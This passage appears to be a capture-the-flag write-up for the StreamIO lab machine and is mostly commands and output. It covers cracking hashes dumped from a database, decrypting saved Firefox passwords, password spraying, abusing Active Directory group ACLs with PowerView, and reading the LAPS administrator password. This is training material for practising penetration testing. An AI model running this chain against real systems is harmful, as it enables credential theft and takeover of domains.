sqlcmd -S '(local)' -U db_admin -P 'B1@hx31234567890' -Q "SELECT username,password FROM streamio_backup..users;"
username                                           password                                          
-------------------------------------------------- --------------------------------------------------
nikk37                                             389d14cb8e4e9b94b137deb1caf0612a                  
yoshihide                                          b779ba15cedfd22a023c4d8bcf5f2332                  
James                                              c660060492d9edcaa8332d89c99c9239                  
Theodore                                           925e5408ecb67aea449373d668b7359e                  
Samantha                                           083ffae904143c4796e464dac33c1f7d                  
Lauren                                             08344b85b329d7efd611b7a7743e8a09                  
William                                            d62be0dc82071bccc1322d64ec5b6c51                  
Sabrina                                            f87d3c0d6c8fd686aacc6627f1f493a5                  

(8 rows affected)

With Crackstation we get the following:

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ cat db_users-backup_pw 
nikk37:get_dem_girls2@yahoo.com
yoshihide:66boysandgirls..
James
Theodore
Samantha
Lauren:##123a8j8w5123##
William
Sabrina:!!sabrina$

Let's continue by gathering user information:

PS C:\inetpub\streamio.htb\admin> whoami /all
whoami /all

USER INFORMATION
----------------

User Name          SID                                           
================== ==============================================
streamio\yoshihide S-1-5-21-1470860369-1569627196-4264678630-1107


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes                                        
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity  Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448                                                    


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

ERROR: Unable to get user claims information.

PS C:\inetpub\streamio.htb\admin> net user /domain
net user /domain

User accounts for \\DC

-------------------------------------------------------------------------------
Administrator            Guest                    JDgodd                   
krbtgt                   Martin                   nikk37                   
yoshihide                
The command completed successfully.

PS C:\inetpub\streamio.htb\admin> net user nikk37 /domain
net user nikk37 /domain
User name                    nikk37
Full Name                    
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/22/2022 2:57:16 AM
Password expires             Never
Password changeable          2/23/2022 2:57:16 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   2/22/2022 3:39:51 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users         
The command completed successfully.

PS C:\inetpub\streamio.htb\admin> net user Martin /domain
net user Martin /domain
User name                    Martin
Full Name                    
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2022 4:16:42 PM
Password expires             Never
Password changeable          5/27/2022 4:16:42 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   9/22/2022 3:57:08 AM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Remote Management Use
Global Group memberships     *Domain Users         
The command completed successfully.

Lateral Movement

This means we should go for nikk37 and escalate privileges to Martin.

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ evil-winrm -i dc.streamio.htb -u 'nikk37' -p 'get_dem_girls2@yahoo.com'   

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\nikk37\Documents> whoami
streamio\nikk37
*Evil-WinRM* PS C:\Users\nikk37\Documents> ls 
*Evil-WinRM* PS C:\Users\nikk37\Documents> ls ..\Desktop


    Directory: C:\Users\nikk37\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/22/2022   3:57 AM             34 user.txt


*Evil-WinRM* PS C:\Users\nikk37\Documents> type ..\Desktop\user.txt
1996f9********************5cf276

And we finally got the user flag!! Let's proceed to escalate privileges.

Privilege Escalation

In our local enumeration, while running winpeas (not included in the writeup), we found out Firefox is installed and the user nikk37 has a key4.db file which is where passwords could be stored. We will download it to our host and use firepwd to decrypt it:

C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db also need logins.json

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ mkdir firefox                                                                                         
                                                                                                                    
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ ls firefox 
key4.db  logins.json

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ python3 /opt/firepwd/firepwd.py -d firefox 
globalSalt: b'd215c391179edb56af928a06c627906bcbd4bd47'
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
     SEQUENCE {
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'5d573772912b3c198b1e3ee43ccb0f03b0b23e46d51c34a2a055e00ebcd240f5'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
           }
         }
       }
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
         OCTETSTRING b'1baafcd931194d48f8ba5775a41f'
       }
     }
   }
   OCTETSTRING b'12e56d1c8458235a4136b280bd7ef9cf'
 }
clearText b'70617373776f72642d636865636b0202'
password check? True
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
     SEQUENCE {
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'098560d3a6f59f76cb8aad8b3bc7c43d84799b55297a47c53d58b74f41e5967e'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
           }
         }
       }
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
         OCTETSTRING b'e28a1fe8bcea476e94d3a722dd96'
       }
     }
   }
   OCTETSTRING b'51ba44cdd139e4d2b25f8d94075ce3aa4a3d516c2e37be634d5e50f6d2f47266'
 }
clearText b'b3610ee6e057c4341fc76bc84cc8f7cd51abfe641a3eec9d0808080808080808'
decrypting login/password pairs
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'

With these, we can test them with a user list from the ones found on the machine and test them:

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ cat << EOF >> domain_users
heredoc> yoshihide
heredoc> Martin
heredoc> JDgodd
heredoc> nikk37
heredoc>    
heredoc> EOF
                                                                                                                    
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ cat << EOF >> firefox_passwd
heredoc> JDg0dd1s@d0p3cr3@t0r
heredoc> n1kk1sd0p3t00:)
heredoc> paddpadd@12
heredoc> password@12
heredoc> 
heredoc> EOF
                                                                                                                    
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ crackmapexec smb dc.streamio.htb -d streamio.htb -u domain_users -p firefox_passwd | grep -v "STATUS_LOGON_FAILURE" 
/usr/lib/python3/dist-packages/pywerview/requester.py:144: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if result['type'] is not 'searchResEntry':
SMB         streamIO.htb    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamio.htb) (signing:True) (SMBv1:False)
SMB         streamIO.htb    445    DC               [+] streamio.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r

Found valid user/passwd pair: JDgodd:JDg0dd1s@d0p3cr3@t0r

Since we now can access another user that is not Martin, we should probably retrieve data for Bloodhound. In this case, we will use bloodhound-python.

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ bloodhound-python -d streamio.htb -u 'JDgodd' -p 'JDg0dd1s@d0p3cr3@t0r' -dc dc.streamio.htb -gc dc.streamio.htb -c all -ns 10.129.56.7
INFO: Found AD domain: streamio.htb
INFO: Connecting to LDAP server: dc.streamio.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.streamio.htb
INFO: Found 8 users
INFO: Connecting to GC LDAP server: dc.streamio.htb
INFO: Found 54 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.streamIO.htb
INFO: Done in 00M 28S

Found Principals with DCSync rights: makes sense as Martin is a Domain Admin

More importantly, JDGodd can read LAPS Password through the CORE STAFF group membership:

But this user is not a member of this group:

*Evil-WinRM* PS C:\Users\nikk37> net group

Group Accounts for \\

-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*CORE STAFF
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\nikk37> net group 'CORE STAFF'
Group name     CORE STAFF
Comment

Members

-------------------------------------------------------------------------------
The command completed successfully.

*Evil-WinRM* PS C:\Users\nikk37> net user JDGodd
User name                    JDgodd
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/22/2022 2:56:42 AM
Password expires             Never
Password changeable          2/23/2022 2:56:42 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2/26/2022 11:17:08 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
The command completed successfully.

We need to add this user to the CORE STAFF group:

*Evil-WinRM* PS C:\Users\nikk37> [string]$userName = 'JDgodd'
*Evil-WinRM* PS C:\Users\nikk37> [string]$userPassword = 'JDg0dd1s@d0p3cr3@t0r'
*Evil-WinRM* PS C:\Users\nikk37> [securestring]$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force
*Evil-WinRM* PS C:\Users\nikk37> [pscredential]$PScred = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword)
*Evil-WinRM* PS C:\Users\nikk37> Add-ADGroupMember -Identity 'CORE STAFF' -Members 'JDgodd' -Credential $PScred
Insufficient access rights to perform the operation
At line:1 char:1
+ Add-ADGroupMember -Identity 'CORE STAFF' -Members 'JDgodd' -Credentia ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (CORE STAFF:ADGroup) [Add-ADGroupMember], ADException
    + FullyQualifiedErrorId : ActiveDirectoryServer:8344,Microsoft.ActiveDirectory.Management.Commands.AddADGroupMember

But we cannot until we make JDGodd owner of the group and apply the domain object ACLs. For this we will use Add-DomainObjectAcl from PowerView.

*Evil-WinRM* PS C:\Users\nikk37> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\nikk37> [string]$userName = 'streamIO.htb\JDgodd'
*Evil-WinRM* PS C:\Users\nikk37> [string]$userPassword = 'JDg0dd1s@d0p3cr3@t0r'
*Evil-WinRM* PS C:\Users\nikk37> [securestring]$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force
*Evil-WinRM* PS C:\Users\nikk37> [pscredential]$PScred = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword)
*Evil-WinRM* PS C:\Users\nikk37> Set-DomainObjectOwner -Identity 'CORE STAFF' -OwnerIdentity JDgodd -Credential $PScred
*Evil-WinRM* PS C:\Users\nikk37> Add-DomainObjectAcl -TargetIdentity 'CORE STAFF' -PrincipalIdentity 'JDgodd' -Crede
ntial $PScred -Rights All
*Evil-WinRM* PS C:\Users\nikk37> Add-ADGroupMember -Identity 'CORE STAFF' -Members 'JDgodd' -Credential $PScred
*Evil-WinRM* PS C:\Users\nikk37> net group 'CORE STAFF'
Group name     CORE STAFF
Comment

Members

-------------------------------------------------------------------------------
JDgodd
The command completed successfully.

Reading LAPS:

*Evil-WinRM* PS C:\Users\nikk37> Get-DomainObject -Identity $Computers.name -Credential $PScred | Format-Table -Auto
Size Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime

name dnshostname     ms-mcs-admpwd  ms-mcs-admpwdexpirationtime
---- -----------     -------------  ---------------------------
DC   DC.streamIO.htb %2jiK&+{8q8+%l          133084042097011826
DC

Accessing the system as Administrator:

┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ evil-winrm -i dc.streamio.htb -u 'Administrator' -p '%2jiK&+{8q8+%l'

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ChildItem -Path C:\Users -Recurse -Filter 'root.txt'


    Directory: C:\Users\Martin\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/22/2022   3:57 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Martin\Desktop\root.txt
836130********************c97a6c

And we got the root flag!!

PreviousSearch NextObject

Last updated 3 years ago

Was this helpful?